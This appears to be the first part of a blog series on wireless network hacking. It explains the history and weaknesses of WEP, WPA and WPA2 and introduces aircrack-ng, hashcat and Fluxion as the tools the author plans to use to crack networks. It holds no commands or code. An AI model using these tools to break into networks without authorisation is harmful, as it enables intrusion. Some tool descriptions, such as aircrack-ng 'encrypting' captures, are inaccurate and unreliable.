Wireless hacking - introduction (Part 1)

With the radical increase of mobile devices, computers and the exponentially increasing amount of IoT devices we have seen in the last decade, wireless ethnology has become an essential part of the way we communicate with the world. It clearly wouldn’t be very practical to have a Ethernet cable connected to every device at home and in the workplace. That is why you will most likely find a wireless network inside any home and workplace in the western world. However, by having all of these wireless access-points, is it possible to compromise the security of your network? Ever since the dawn of wireless communication, there have been security issues regarding the 802.11 standards. Even though wireless technology keeps getting better, with an ongoing evolution of algorithms such as WEP, WPA, WPA2, and WPS, you still cannot get away from the plain fact that the connection is still wireless, which means that anyone with the right credentials can access your network without physical access.

Jesse R. Walker wrote one of the first articles regarding security related to the IEEE 802.11 standard,published by Intel and Walker. It argued that the current cipher used by the 802.11 standards (WEP) was insecure (Walker, 2000). This was also recognized by the industry and many thought that the solution to this problem was to simply increase the current 40-bit encryption mechanism to a 128-bit algorithm. However, Walker argued that this would not fix the problem since the encryption algorithm WEP used was an RC4 stream cipher and it would not matter if the keystream ended up being encrypted with 1-bit or 1000-bit, the WEP data-stream would still be vulnerable.

In response to the serious weaknesses and variables found the in WEP encryption standard, a new standard was developed: the Wi-Fi Protected Access (WPA) and the Wi-Fi Protected Access II (WPA2) standard. These two security protocols were developed by a non-profit organization called Wi-Fi Alliance (Park & Dico, 2003).

WPA

With the arrival of the new WPA security standard, a protocol called TKIP (Temporal Key Integrity Protocol) came with it (Paterson, Poettering, & Schuldt, 2014, ss. 1-2). TKIP was integrated to the WPA standard to make sure that there was something unique implemented into all of the encryption keys used on the network, thereby ensuring that every packet gets its unique encryption key.

 

TKIP was implemented with a few additional security measures, which were lacking in the previous WEP standard, these include;

Mixed Keys: One of the improvements found in the TKIP protocol is that it uses something called Mixed Keys.  This means that it takes the secret root key and mixes it with the initialization vector. This makes the key way more secure since it is unique and constantly changing. (LASHKARI, DANESH, & SAMADI, 2009, ss. 3-4).

Sequence numbers: When someone pre-forms a replay attack they typically record some traffic going over the network and then replay the same traffic to get access to a resource. Since TIKP adds a sequence number, each of the packets will have a unique characteristic to it, and if a packet is not received in the correct order, it will automatically be dropped. This makes replay attacks much harder (Vanhoef & Piessens, 2013 , ss. 2-3).

MIC:  There is also an integrity mechanism implemented into the TIKP protocol, a 64-bit message integrity check, which sends the message through an algorithm at the transmitter and adds the resulting value as a tag to the data. When the receiver receives the data packed, it recomputes the message through the same algorithm, and if the result is consistent with the value send from the transmitter, the message will be accepted, or dropped if it is not (LASHKARI, DANESH, & SAMADI, 2009, s. 3; Cam-Winget, Housley, Wagner, & Walker, 2003, s. 3). This assures that the message sent from the transmitter is the same as the message received and thereby protects against various types of man-in-the-middle attacks.

WPA2

One year later, after the release of the WPA standard, the WPA2 protocol was released (Kumkar, Tiwari, Tiwari, Gupta, & Shrawne, 2012, s. 1). This is the security standard usually used by people today. Even though it is possible to use TKIP together with WPA2, a newer encryption algorithm called AES-CCMP is usually preferred due to its vastly more complex nature.

In addition to AES being a much stronger encryption algorithm, both TKIP and AES-CCMP operate similarly.  The only difference between TKIP and AES-CCMP are the number of keys used. AES-CCMP combines the key used for the integrity check and the key used for encryption, as shown in the picture below (Perez, 2004, s. 15).

To crack these networks, multiple tools are going to be used. These are some of them:

Aircrack-ng

This is a very powerful tool consisting of various utilities related to cracking wireless networks, but I will mainly be using these:

  • Airmon-ng: This is the tool used to set the wifi adapter into monitoring mode.
  • Aireplay-ng: Used to inject traffic into the network.
  • Airodump-ng: This tool is used to capture raw 802.11 frames.
  • Aircrack-ng: This is a tool used to encrypt the packet captured by with airdump-ng

Hashcat

This is also a very powerful and widely used tool, recognized by many as the fastest password cracker in the world! This is mostly because it works so efficiently with GPUs instead of relying on CPUs to do its calculations. I will be using it to brute-force the WPA2 handshake.

Fluxion

Fluxion is a tool which has made the whole process of hacking wireless network incredibly easy. Fluxion also utilizes tools such as aircrack-ng, but integrates some clever social engineering to the process. I will be using this tool to get access to the last network.

 

Leave a Reply

Your email address will not be published. Required fields are marked *